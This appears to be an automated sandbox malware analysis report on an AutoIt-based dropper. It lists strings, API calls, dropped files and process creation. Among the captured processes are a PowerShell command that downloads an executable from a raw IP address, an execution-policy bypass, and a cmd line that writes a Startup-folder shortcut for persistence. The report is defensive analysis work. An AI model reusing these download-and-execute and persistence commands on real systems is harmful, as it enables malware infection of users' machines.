Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000008.00000002.2315969638.0000022C5CD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000013.00000002.3434288775.000001B7CC800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.19.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000000.2314147832.00000000001B9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 00000011.00000000.2473325252.0000000000CA9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: qmgr.db.19.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2586107230.000001B7CC740000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00007FF6439B0D24
Source: C:\Users\Public\Guard.exeCode function: 11_2_00164830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00164830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C54830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00C54830
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00007FF6439B0A6C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643998CAC GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00007FF643998CAC
Source: C:\Users\Public\Guard.exeCode function: 11_2_0017D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0017D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C6D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_00C6D164

System Summary

Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: This is a third-party compiled AutoIt script.1_2_00007FF6439237B0
Source: PPbimZI4LV.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PPbimZI4LV.exe, 00000001.00000000.2186050893.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c35c6d3b-d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C110: CreateFileW,DeviceIoControl,CloseHandle,1_2_00007FF64399C110
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00007FF64398CE68
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00007FF64399D750
Source: C:\Users\Public\Guard.exeCode function: 11_2_00155778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00155778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C45778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00C45778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: String function: 00007FF643948D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00101A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00110D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00118B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00BF1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00C00D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00C08B30 appears 42 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@16/16@2/2
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A3778 GetLastError,FormatMessageW,1_2_00007FF6439A3778
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CCE0 AdjustTokenPrivileges,CloseHandle,1_2_00007FF64398CCE0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00007FF64398D5CC
Source: C:\Users\Public\Guard.exeCode function: 11_2_00148DE9 AdjustTokenPrivileges,CloseHandle,11_2_00148DE9
Source: C:\Users\Public\Guard.exeCode function: 11_2_00149399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00149399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C38DE9 AdjustTokenPrivileges,CloseHandle,17_2_00C38DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C39399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00C39399
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00007FF6439A58C4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439BEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_00007FF6439BEB34
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A83D4 CoInitialize,SHGetSpecialFolderLocation,SHGetDesktopFolder,CoCreateInstance,SHCreateShellItem,CoTaskMemFree,SHBrowseForFolderW,SHGetPathFromIDListW,CoTaskMemFree,CoTaskMemFree,CoUninitialize,1_2_00007FF6439A83D4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643926580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00007FF643926580
Source: C:\Users\user\Desktop\PPbimZI4LV.exeFile created: C:\Users\Public\PublicProfile.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewvubiqc.iw0.ps1Jump to behavior
Source: PPbimZI4LV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PPbimZI4LV.exeVirustotal: Detection: 27%
Source: PPbimZI4LV.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\PPbimZI4LV.exe "C:\Users\user\Desktop\PPbimZI4LV.exe"
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: PPbimZI4LV.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: PPbimZI4LV.exe | Static file information: File size 1083904 > 1048576
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PPbimZI4LV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PPbimZI4LV.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: PPbimZI4LV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PPbimZI4LV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PPbimZI4LV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PPbimZI4LV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PPbimZI4LV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\PPbimZI4LV.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\PPbimZI4LV.exe | Code function: 1_2_00007FF643926D1C LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\PPbimZI4LV.exe | Code function: 1_2_00007FF643957399 push rdi; ret 1_2_00007FF6439573A2
Source: C:\Users\user\Desktop\PPbimZI4LV.exe | Code function: 1_2_00007FF6439578FD push rdi; ret 1_2_00007FF643957904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD33EA19DB pushad ; ret 8_2_00007FFD33EA19E9
Source: C:\Users\Public\Guard.exe | Code function: 11_2_00118B75 push ecx; ret 11_2_00118B88
Source: C:\Users\Public\Guard.exe | Code function: 11_2_0010CBDB push eax; retf 11_2_0010CBF8
Source: C:\Users\Public\Guard.exe | Code function: 11_2_0010CC06 push eax; retf 11_2_0010CBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 17_2_00C08B75 push ecx; ret 17_2_00C08B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 17_2_00BFF1DF push ebp; ret 17_2_00BFF1E1
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 17_2_00BFF1CF push ebp; ret 17_2_00BFF1DD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 17_2_00BFD280 push ss; ret 17_2_00BFD29A

Persistence and Installation Behavior

Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643944514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00007FF643944514
Source: C:\Users\Public\Guard.exeCode function: 11_2_001759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_001759B3
Source: C:\Users\Public\Guard.exeCode function: 11_2_00105EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00105EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_00C659B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00BF5EDA
Source: C:\Users\Public\Guard.exeCode function: 11_2_001133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_001133B7
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4556Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5298Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4869Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4931Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\PPbimZI4LV.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4869 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4931 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2524Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00007FF64399C7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA4F8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A6428 FindFirstFileW,FindNextFileW,FindClose,1_2_00007FF6439A6428
